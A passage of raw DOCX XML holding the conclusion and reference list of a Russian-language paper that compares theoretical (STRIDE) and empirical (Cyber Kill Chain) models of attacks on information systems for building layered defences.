        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>ЗАКЛЮЧЕНИЕ</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D6FEA63" w14:textId="77777777" w:rsidR="0013518B" w:rsidRDefault="00507B97" w:rsidP="00520A08">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:spacing w:before="0" w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="af-ZA" w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="_Toc161761589"/>
      <w:bookmarkStart w:id="7" w:name="_Hlk161758504"/>
      <w:r w:rsidRPr="00507B97">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="af-ZA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">В результате проведенного анализа теоретических и эмпирических моделей атак на информационные системы можно сделать несколько важных выводов. Модели атак являются неотъемлемой частью разработки эффективной защиты от киберугроз, поскольку они помогают не только реагировать на уже произошедшие инциденты, но и предсказывать возможные угрозы. Теоретические модели, такие как STRIDE, позволяют заранее классифицировать потенциальные угрозы на этапе проектирования системы. Это дает возможность заблаговременно учитывать уязвимости и строить защиту от наиболее вероятных атак. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1090D405" w14:textId="77777777" w:rsidR="0013518B" w:rsidRDefault="00507B97" w:rsidP="00520A08">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:spacing w:before="0" w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="af-ZA" w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00507B97">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="af-ZA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">Эти модели хорошо работают на этапе разработки, так как их можно адаптировать для любой системы и заранее подготовить методы защиты от предсказуемых угроз. Однако теоретические модели имеют определенные ограничения, так как они зачастую не учитывают реальные условия эксплуатации системы, и в результате могут не полностью отражать картину возможных угроз. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="138175C0" w14:textId="534170CA" w:rsidR="0013518B" w:rsidRDefault="00507B97" w:rsidP="00520A08">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:spacing w:before="0" w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="af-ZA" w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00507B97">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="af-ZA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">С другой стороны, эмпирические модели атак, основанные на анализе реальных инцидентов, предоставляют более детальное и реалистичное представление о том, как происходят атаки в реальности. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AA5CEA2" w14:textId="77777777" w:rsidR="0013518B" w:rsidRDefault="00507B97" w:rsidP="00520A08">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:spacing w:before="0" w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="af-ZA" w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00507B97">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="af-ZA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">Модели, такие как Cyber Kill Chain, позволяют подробно изучить процесс атаки, от разведки до кражи данных, что помогает построить эффективные системы защиты на основе реального опыта. Однако эти модели также имеют свои недостатки, так как они зависят от истории атак и не всегда могут предсказать новые, неизвестные угрозы. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DC342D9" w14:textId="77777777" w:rsidR="0013518B" w:rsidRDefault="00507B97" w:rsidP="00520A08">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:spacing w:before="0" w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="af-ZA" w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00507B97">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="af-ZA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">Эмпирические модели помогают оперативно реагировать на угрозы, но могут оказаться неэффективными, если атака будет существенно отличаться от тех, что уже были зафиксированы. Таким образом, использование как теоретических, так и эмпирических моделей атак необходимо для построения многослойной системы защиты. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C229ED9" w14:textId="77777777" w:rsidR="0013518B" w:rsidRDefault="00507B97" w:rsidP="00520A08">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:spacing w:before="0" w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="af-ZA" w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00507B97">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="af-ZA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">Теоретические модели помогают заранее предсказать и предотвратить атаки, а эмпирические модели, основанные на реальных данных, позволяют оперативно адаптировать защиту в условиях новых угроз. Важно отметить, что ни одна из моделей не является универсальной и безупречной. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D247201" w14:textId="2B499D14" w:rsidR="00507B97" w:rsidRPr="00772B53" w:rsidRDefault="00507B97" w:rsidP="00772B53">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:spacing w:before="0" w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00507B97">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="af-ZA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>Эффективная защита требует постоянного обновления и адаптации моделей атак к изменяющимся условиям, а также обучения персонала для правильного применения этих моделей в реальных ситуациях. Только комплексный подход, использующий теоретические и эмпирические методы, может обеспечить надежную защиту информационных систем и</w:t>
      </w:r>
      <w:r w:rsidR="00677DF5">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="af-ZA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00677DF5">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>минимизировать риски атак</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="6"/>
    <w:p w14:paraId="20A894D4" w14:textId="6EC6AAD3" w:rsidR="00707779" w:rsidRPr="00DA1778" w:rsidRDefault="00DA1778" w:rsidP="00520A08">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Л</w:t>
      </w:r>
      <w:r w:rsidR="00251867">
        <w:rPr>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>ИТЕРАТУРА</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2117603B" w14:textId="77777777" w:rsidR="008C76C0" w:rsidRPr="008C76C0" w:rsidRDefault="00251867" w:rsidP="00520A08">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:val="af-ZA" w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008C76C0">
        <w:rPr>
          <w:lang w:val="af-ZA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">M. Allen, J. O'Donnell. "Cyberattack Models for Critical Infrastructure Protection," Journal of Cybersecurity, vol. 25, No. 3, pp. 45-58, 2020. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06F4C20E" w14:textId="77777777" w:rsidR="008C76C0" w:rsidRPr="008C76C0" w:rsidRDefault="00251867" w:rsidP="00520A08">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:val="af-ZA" w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008C76C0">
        <w:rPr>
          <w:lang w:val="af-ZA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">S. Kumar, R. Patel, P. Singh. "STRIDE Model for Predicting Cybersecurity Threats," International Conference on Information Security and Privacy, 2019, pp. 112-119. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08C958A5" w14:textId="77777777" w:rsidR="008C76C0" w:rsidRPr="008C76C0" w:rsidRDefault="00251867" w:rsidP="00520A08">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:val="af-ZA" w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008C76C0">
        <w:rPr>
          <w:lang w:val="af-ZA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">R. Smith, L. Johnson. "Empirical Models in Cybersecurity: Case Study Analysis of Attack Scenarios," Cyber Defense Review, vol. 18, No. 4, pp. 203-210, 2018. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="392294DB" w14:textId="77777777" w:rsidR="008C76C0" w:rsidRPr="008C76C0" w:rsidRDefault="00251867" w:rsidP="00520A08">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:val="af-ZA" w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008C76C0">
        <w:rPr>
          <w:lang w:val="af-ZA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">S. Chouhan, V. Kumar. "Machine Learning Approaches for Cyberattack Detection and Mitigation," IEEE Transactions on Dependable and Secure Computing, vol. 15, No. 5, pp. 789-795, 2022. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FE74018" w14:textId="77777777" w:rsidR="008C76C0" w:rsidRPr="008C76C0" w:rsidRDefault="00251867" w:rsidP="00520A08">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:val="af-ZA" w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008C76C0">
        <w:rPr>
          <w:lang w:val="af-ZA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">G. Patel, H. Rao, M. Choudhary. "Empirical Approaches in Cyber Kill Chain Modeling," International Journal of Cyber Security, vol. 29, No. 6, pp. 65-72, 2021. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="537D9BCC" w14:textId="77777777" w:rsidR="008C76C0" w:rsidRPr="008C76C0" w:rsidRDefault="00251867" w:rsidP="00520A08">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:val="af-ZA" w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008C76C0">
        <w:rPr>
          <w:lang w:val="af-ZA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">S. K. Gupta, A. Sharma. "Application of Theoretical Attack Models for Data Security," Journal of Computer Security, vol. 16, No. 2, pp. 121-130, 2017. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DBDE1B8" w14:textId="77777777" w:rsidR="008C76C0" w:rsidRPr="008C76C0" w:rsidRDefault="00251867" w:rsidP="00520A08">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:val="af-ZA" w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008C76C0">
        <w:rPr>
          <w:lang w:val="af-ZA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">J. Wang, T. Li, P. Zhou. "Simulation-based Defense Strategies for Advanced Persistent Threats in Cybersecurity," International Journal of Digital Security, 2020, pp. 88-92. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2280DFB2" w14:textId="77777777" w:rsidR="008C76C0" w:rsidRPr="008C76C0" w:rsidRDefault="00251867" w:rsidP="00520A08">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:val="af-ZA" w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008C76C0">
        <w:rPr>
          <w:lang w:val="af-ZA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>P. T. Russo, E. Villari. "Integrating Cyberattack Simulation in the Design of Secure Systems," Proceedings of the 4th International Workshop on Security and Cryptography, 2019, pp. 113-118.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EBDB554" w14:textId="3224A1A5" w:rsidR="00A15417" w:rsidRPr="008C76C0" w:rsidRDefault="001B2A34" w:rsidP="00520A08">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:val="af-ZA" w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId18" w:history="1">
        <w:r w:rsidR="008C76C0" w:rsidRPr="008C76C0">
          <w:rPr>
            <w:rStyle w:val="a7"/>
            <w:bCs/>
            <w:lang w:val="af-ZA" w:eastAsia="ru-RU"/>
          </w:rPr>
          <w:t>https://ict.az/az/content/250</w:t>
        </w:r>
      </w:hyperlink>
      <w:bookmarkEnd w:id="0"/>
      <w:bookmarkEnd w:id="7"/>
    </w:p>
    <w:sectPr w:rsidR="00A15417" w:rsidRPr="008C76C0" w:rsidSect="00772B53">
      <w:headerReference w:type="default" r:id="rId19"/>
      <w:pgSz w:w="11906" w:h="16838"/>
      <w:pgMar w:top="1134" w:right="567"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C78F55" w14:textId="77777777" w:rsidR="001B2A34" w:rsidRDefault="001B2A34" w:rsidP="00337E66">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="6AB0466D" w14:textId="77777777" w:rsidR="001B2A34" w:rsidRDefault="001B2A34" w:rsidP="00337E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Roman AzLat">
    <w:altName w:val="Times New Roman"/>
    <w:charset w:val="CC"/>
    <w:family w:val="roman"/>
    <w:pitch w:val="variable"/>
    <w:sig w:usb0="00000201" w:usb1="00000000" w:usb2="00000000" w:usb3="00000000" w:csb0="00000004"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D7C6A7" w14:textId="77777777" w:rsidR="001B2A34" w:rsidRDefault="001B2A34" w:rsidP="00337E66">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="191F675B" w14:textId="77777777" w:rsidR="001B2A34" w:rsidRDefault="001B2A34" w:rsidP="00337E6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9533855"/>
      <w:docPartObj>
        <w:docPartGallery w:val="Page Numbers (Top of Page)"/>
        <w:docPartUnique/>
      </w:docPartObj>
    </w:sdtPr>
    <w:sdtEndPr/>
    <w:sdtContent>
      <w:p w14:paraId="364DA7EF" w14:textId="434AE3D6" w:rsidR="00772B53" w:rsidRDefault="00772B53">
        <w:pPr>
          <w:pStyle w:val="af1"/>
          <w:jc w:val="right"/>
        </w:pPr>
        <w:r>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:instrText>PAGE   \* MERGEFORMAT</w:instrText>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:t>2</w:t>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:p>
    </w:sdtContent>
  </w:sdt>
  <w:p w14:paraId="1BCCC4BD" w14:textId="77777777" w:rsidR="00772B53" w:rsidRDefault="00772B53">
    <w:pPr>
      <w:pStyle w:val="af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F24422"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0EE6FF0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773A4D46"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D5721CD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87C"/>
    <w:rsid w:val="000207C8"/>
    <w:rsid w:val="0002589B"/>
    <w:rsid w:val="00025FDF"/>
    <w:rsid w:val="000262BB"/>
    <w:rsid w:val="00031C50"/>
    <w:rsid w:val="000328D8"/>
    <w:rsid w:val="00034780"/>
    <w:rsid w:val="0003617E"/>
    <w:rsid w:val="0004332E"/>
    <w:rsid w:val="00043BFF"/>
    <w:rsid w:val="00057D09"/>
    <w:rsid w:val="00062036"/>
    <w:rsid w:val="00062798"/>
    <w:rsid w:val="000A234E"/>
    <w:rsid w:val="000B0663"/>
    <w:rsid w:val="000B1404"/>
    <w:rsid w:val="000D0C42"/>
    <w:rsid w:val="000E651B"/>
    <w:rsid w:val="000E6A67"/>
    <w:rsid w:val="000F5C18"/>
    <w:rsid w:val="001036E2"/>
    <w:rsid w:val="00106292"/>
    <w:rsid w:val="00114EC4"/>
    <w:rsid w:val="001156E1"/>
    <w:rsid w:val="0013518B"/>
    <w:rsid w:val="00137E0F"/>
    <w:rsid w:val="001470DA"/>
    <w:rsid w:val="00151D19"/>
    <w:rsid w:val="00153D51"/>
    <w:rsid w:val="0017437E"/>
    <w:rsid w:val="0019096D"/>
    <w:rsid w:val="00191BF2"/>
    <w:rsid w:val="001944FF"/>
    <w:rsid w:val="001A31B5"/>
    <w:rsid w:val="001A60F6"/>
    <w:rsid w:val="001B2A34"/>
    <w:rsid w:val="001C5EC3"/>
    <w:rsid w:val="001C6DA3"/>
    <w:rsid w:val="001D2B1D"/>
    <w:rsid w:val="001E5D6B"/>
    <w:rsid w:val="00232EB6"/>
    <w:rsid w:val="00246E4A"/>
    <w:rsid w:val="00247A2A"/>
    <w:rsid w:val="00251867"/>
    <w:rsid w:val="002702FC"/>
    <w:rsid w:val="002772AD"/>
    <w:rsid w:val="00281743"/>
    <w:rsid w:val="00287E1B"/>
    <w:rsid w:val="002B12B0"/>
    <w:rsid w:val="002B3BBA"/>
    <w:rsid w:val="002E1F8D"/>
    <w:rsid w:val="003242AB"/>
    <w:rsid w:val="00331AF6"/>
    <w:rsid w:val="00337E66"/>
    <w:rsid w:val="00341F7F"/>
    <w:rsid w:val="00343A2A"/>
    <w:rsid w:val="00346970"/>
    <w:rsid w:val="00352ED1"/>
    <w:rsid w:val="003618F8"/>
    <w:rsid w:val="00365410"/>
    <w:rsid w:val="00372FAB"/>
    <w:rsid w:val="00383137"/>
    <w:rsid w:val="00390A81"/>
    <w:rsid w:val="003A7C01"/>
    <w:rsid w:val="003B2F93"/>
    <w:rsid w:val="003C157A"/>
    <w:rsid w:val="003C452E"/>
    <w:rsid w:val="003C55BA"/>
    <w:rsid w:val="003E29CA"/>
    <w:rsid w:val="003F54ED"/>
    <w:rsid w:val="003F5C00"/>
    <w:rsid w:val="004100D4"/>
    <w:rsid w:val="0041466D"/>
    <w:rsid w:val="00415F71"/>
    <w:rsid w:val="00417456"/>
    <w:rsid w:val="004241E8"/>
    <w:rsid w:val="00425569"/>
    <w:rsid w:val="00434CF0"/>
    <w:rsid w:val="00441E81"/>
    <w:rsid w:val="0045731F"/>
    <w:rsid w:val="004573DD"/>
    <w:rsid w:val="0046024C"/>
    <w:rsid w:val="004720E0"/>
    <w:rsid w:val="004A47AB"/>
    <w:rsid w:val="004B7E7E"/>
    <w:rsid w:val="004C0C4D"/>
    <w:rsid w:val="004D386F"/>
    <w:rsid w:val="004D7F00"/>
    <w:rsid w:val="004E36EE"/>
    <w:rsid w:val="004F33D1"/>
    <w:rsid w:val="004F3AA2"/>
    <w:rsid w:val="0050626B"/>
    <w:rsid w:val="00507B97"/>
    <w:rsid w:val="00516A4B"/>
    <w:rsid w:val="00517B58"/>
    <w:rsid w:val="00520A08"/>
    <w:rsid w:val="005238C9"/>
    <w:rsid w:val="0052558A"/>
    <w:rsid w:val="00533A78"/>
    <w:rsid w:val="00566F75"/>
    <w:rsid w:val="005759DA"/>
    <w:rsid w:val="00585B71"/>
    <w:rsid w:val="005C5E62"/>
    <w:rsid w:val="005D440D"/>
    <w:rsid w:val="005F0035"/>
    <w:rsid w:val="005F1B9E"/>
    <w:rsid w:val="005F2AC1"/>
    <w:rsid w:val="006018BD"/>
    <w:rsid w:val="006116F3"/>
    <w:rsid w:val="0061241B"/>
    <w:rsid w:val="00617AFD"/>
    <w:rsid w:val="00644E83"/>
    <w:rsid w:val="00661063"/>
    <w:rsid w:val="006650E9"/>
    <w:rsid w:val="00671FD0"/>
    <w:rsid w:val="0067601F"/>
    <w:rsid w:val="00677DF5"/>
    <w:rsid w:val="006852A6"/>
    <w:rsid w:val="00694FF1"/>
    <w:rsid w:val="006954E4"/>
    <w:rsid w:val="006A68E9"/>
    <w:rsid w:val="006F1043"/>
    <w:rsid w:val="006F6E9D"/>
    <w:rsid w:val="00707779"/>
    <w:rsid w:val="00730D29"/>
    <w:rsid w:val="00731BAF"/>
    <w:rsid w:val="007322CC"/>
    <w:rsid w:val="00743494"/>
    <w:rsid w:val="00745E30"/>
    <w:rsid w:val="00753345"/>
    <w:rsid w:val="00767AA1"/>
    <w:rsid w:val="00772B53"/>
    <w:rsid w:val="00774FBE"/>
    <w:rsid w:val="00777C1F"/>
    <w:rsid w:val="00781802"/>
    <w:rsid w:val="00784E76"/>
    <w:rsid w:val="007957B2"/>
    <w:rsid w:val="007A2DE2"/>
    <w:rsid w:val="007C0217"/>
    <w:rsid w:val="007C1328"/>
    <w:rsid w:val="007D4177"/>
    <w:rsid w:val="007D4A70"/>
    <w:rsid w:val="007E0BCF"/>
    <w:rsid w:val="007F4A58"/>
    <w:rsid w:val="008011DB"/>
    <w:rsid w:val="00806625"/>
    <w:rsid w:val="0081694A"/>
    <w:rsid w:val="0082742F"/>
    <w:rsid w:val="00844BEC"/>
    <w:rsid w:val="00844D2E"/>
    <w:rsid w:val="0084561D"/>
    <w:rsid w:val="00846EFC"/>
    <w:rsid w:val="0088092B"/>
    <w:rsid w:val="008845FA"/>
    <w:rsid w:val="00893E62"/>
    <w:rsid w:val="00897C99"/>
    <w:rsid w:val="008A3AA4"/>
    <w:rsid w:val="008A4FE7"/>
    <w:rsid w:val="008B43D8"/>
    <w:rsid w:val="008C76C0"/>
    <w:rsid w:val="008D78D9"/>
    <w:rsid w:val="008E31D6"/>
    <w:rsid w:val="008E35E4"/>
    <w:rsid w:val="008E40AC"/>
    <w:rsid w:val="0090356E"/>
    <w:rsid w:val="009137C1"/>
    <w:rsid w:val="009279B4"/>
    <w:rsid w:val="00935626"/>
    <w:rsid w:val="00936C96"/>
    <w:rsid w:val="009479E0"/>
    <w:rsid w:val="009538BE"/>
    <w:rsid w:val="00960768"/>
    <w:rsid w:val="00963588"/>
    <w:rsid w:val="00970685"/>
    <w:rsid w:val="009876D8"/>
    <w:rsid w:val="009A3671"/>
    <w:rsid w:val="009C22CF"/>
    <w:rsid w:val="009D7C60"/>
    <w:rsid w:val="009E5355"/>
    <w:rsid w:val="009F28CE"/>
    <w:rsid w:val="00A10B6D"/>
    <w:rsid w:val="00A136DC"/>
    <w:rsid w:val="00A15417"/>
    <w:rsid w:val="00A4455C"/>
    <w:rsid w:val="00A62ADD"/>
    <w:rsid w:val="00A65F28"/>
    <w:rsid w:val="00A818C6"/>
    <w:rsid w:val="00A84FDA"/>
    <w:rsid w:val="00AB7A77"/>
    <w:rsid w:val="00AC439D"/>
    <w:rsid w:val="00AF11F0"/>
    <w:rsid w:val="00AF31DF"/>
    <w:rsid w:val="00B176C5"/>
    <w:rsid w:val="00B47C64"/>
    <w:rsid w:val="00B51281"/>
    <w:rsid w:val="00B53312"/>
    <w:rsid w:val="00B54894"/>
    <w:rsid w:val="00B54F68"/>
    <w:rsid w:val="00B73191"/>
    <w:rsid w:val="00B767B5"/>
    <w:rsid w:val="00B818CB"/>
    <w:rsid w:val="00B92029"/>
    <w:rsid w:val="00B9585F"/>
    <w:rsid w:val="00B96B4C"/>
    <w:rsid w:val="00BC25C4"/>
    <w:rsid w:val="00BC644F"/>
    <w:rsid w:val="00BE2B61"/>
    <w:rsid w:val="00BF5FF6"/>
    <w:rsid w:val="00C04784"/>
    <w:rsid w:val="00C079FC"/>
    <w:rsid w:val="00C15250"/>
    <w:rsid w:val="00C31F51"/>
    <w:rsid w:val="00C35A37"/>
    <w:rsid w:val="00C4387C"/>
    <w:rsid w:val="00C738B7"/>
    <w:rsid w:val="00C75B52"/>
    <w:rsid w:val="00C92CEB"/>
    <w:rsid w:val="00CC52B3"/>
    <w:rsid w:val="00CC5BEA"/>
    <w:rsid w:val="00CE4F58"/>
    <w:rsid w:val="00CF1410"/>
    <w:rsid w:val="00D008B7"/>
    <w:rsid w:val="00D03E00"/>
    <w:rsid w:val="00D04381"/>
    <w:rsid w:val="00D14B15"/>
    <w:rsid w:val="00D1673C"/>
    <w:rsid w:val="00D41A28"/>
    <w:rsid w:val="00D57081"/>
    <w:rsid w:val="00D84C57"/>
    <w:rsid w:val="00DA1296"/>
